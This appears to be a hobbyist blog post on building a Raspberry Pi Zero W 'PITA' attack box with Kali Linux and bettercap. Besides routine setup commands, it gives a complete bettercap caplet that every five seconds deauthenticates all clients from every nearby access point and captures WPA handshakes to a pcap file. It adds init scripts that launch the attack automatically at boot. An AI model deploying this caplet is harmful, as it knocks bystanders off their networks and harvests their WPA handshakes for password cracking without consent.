PITA Install Documentation

Intro

This is some thoughts on trying to get evilsocket's PITA setup working on Kali in 2019. evilsocket is an absolute badass hacker, he wrote bettercap which has some of his other projects integrated. He made a write up about this in 2018, but I think the re4son kernel and Kali have changed enough to make some of that break. This is a WIP of my journey to get something similar working.

Issues with the original article

I wanted to make the exact setup. Get a Pi Zero W running with bettercap installed, and use a Bluetooth PAN network for the management. There's a few obvious benefits to this setup.

No extra hardware needed! This frees the USB data port up for becoming a USB Ethernet gadget or plugging something else in (GPS? RF Radio?)
Bluetooth isn't susceptable to deauth attacks like a WiFi management AP would be.

Unfortunately, I haven't been able to get a Bluetooth PAN working with Kali (as of the 2019.02 image). The implimentation with evilsocket mentions this briefly in a tweet I can't find, but the way that the nexmon drivers interact with the re4son kernel has some stuff that doesn't fit perfectly.

Fix the bluetooth configuration file /etc/systemd/system/bluetooth.target.wants/bluetooth.service by disabling the SAP plugin that would break bluetooth, change the ExecStart part with...

I tried both his method for getting a BT PAN setup, as well as a script I found here, I coudn't get either to reliably connect. Maybe it's my gear or I'm missing something important. I even tried the StickyFingers build of Kali and couldn't get that working. I'll keep trying to get this part working as it seems to be an optimal solution.

Installing from Kali

Download Kali Linux RPi0w Nexmon
Write the image to your microSD card with etcher or dd.
Plug in your Pi, preferably use a Ethernet adapter or wireless to connect your Pi to your home WiFi.
SSH into your device using the default root password (toor)
Issue these commands:

# always change the default root password
passwd
# regenerate ssh keys
ssh-keygen
# set a nicer hostname :D
hostname -b pita
echo pita > /etc/hostname
echo "127.0.0.1 pita" >> /etc/hosts
# update the system
apt update 
apt upgrade
# install a few useful packages and setup swap
apt install git dphys-swapfile
# set CONF_SWAPSIZE to 1024
echo "CONF_SWAPSIZE=1024" >> /etc/dphys-swapfile
systemctl enable dphys-swapfile
# set the correct timezone
dpkg-reconfigure tzdata
# reboot to apply the effects
reboot

Install go and more dependancies

apt install -y golang libpcap-dev libusb-1.0-0-dev hostapd
echo "export GOPATH=/root/go" >> .bashrc
echo "PATH=$PATH:$GOPATH/bin" >> .bashrc

Install bettercap using the instructions here
Get the StickyFingers tools

cd ~
git clone https://github.com/Re4son/Kali-Pi

Install bettercap caplets

bettercap -eval "caplets.update; ui.update; q"

Configure your management AP settings

nano ~/Kali-Pi/Menus/RAS-AP/ras-ap.conf

Change ignore_broadcast_ssid=1 to ignore_broadcast_ssid=0 so the AP is visible

Change your ssid and wpa_passphrase to whatever you like.

Create an empty file at /usr/bin/nexutil so ~/Kali-Pi/Menus/RAS-AP/ras-ap.sh brings up a monitor interface

touch /usr/bin/nexutil

Create a cert for bettercap's https-ui (I couldn't figure out why the auto generate function wasn't working, maybe I'll look into that)

openssl req -x509 -nodes -sha256 -newkey rsa:2048 -keyout .bettercap-https.key.pem -out .bettercap-https.cert.pem -days 3650 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com"

Change your username and password in /usr/local/share/bettercap/caplets/https-ui.cap
Make some changes to the pita caplet

I had issues with the !monstop and !monstart commands making this caplet crash, so I commented them out. It's also handled in my startPita.sh script. I also added some deauth skip lines to make sure your management interface isn't getting blasted too. Here's what my updated file looks like:

# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392

set $ {bold}😈 » {reset}

# make sure wlan0 is in monitor mode
# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh
#!monstop
#!monstart

# every 5 seconds:
# - clear the screen
# - show the list of nearby access points 
# - deauth every client from each one of them
set ticker.period 5
# CHANGE THIS TO YOUR AP MAC ADDRESS (ifconfig wlan0)
set wifi.deauth.skip 00:11:22:33:44:55
set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff
# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wpa.pcap

# uncomment to only hop on these channels:
# wifi.recon.channel 1,2,3
wifi.recon on
ticker on
net.sniff on

# we'll see lots of probes after each deauth, just skip the noise ...
events.ignore wifi.client.probe
# start fresh
events.clear
clear

Putting together an init.d startup script

Create your Init script (/etc/init.d/pita-startup)

#!/bin/bash
### BEGIN INIT INFO
# Provides:       pita-startup
# Required-Start:    $local_fs $remote_fs $network $syslog $named
# Required-Stop:     $local_fs $remote_fs $network $syslog $named
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: starts pita-startup
# Description:       starts pita-startup using start-stop-daemon
### END INIT INFO
/usr/bin/screen -dm -S bettercap /root/startPita.sh

Make it executable

chmod +x /etc/init.d/pita-startup

Install it

update-rc.d pita-startup defaults

Create your startup script (startPita.sh), it should look something like this:

#!/bin/bash
# This is getting called from /etc/init.d/pita-startup
export MENUDIR=/root/Kali-Pi/Menus
/root/Kali-Pi/Menus/RAS-AP/ras-ap.sh start
sleep 5
FOUND=`grep "wlan1" /proc/net/dev`
if  [ -n "$FOUND" ] ; then
        iw phy phy1 interface add mon1 type monitor
        ifconfig mon1 up
        bettercap -iface wlan1 -caplet https-ui
else
        bettercap -caplet https-ui
fi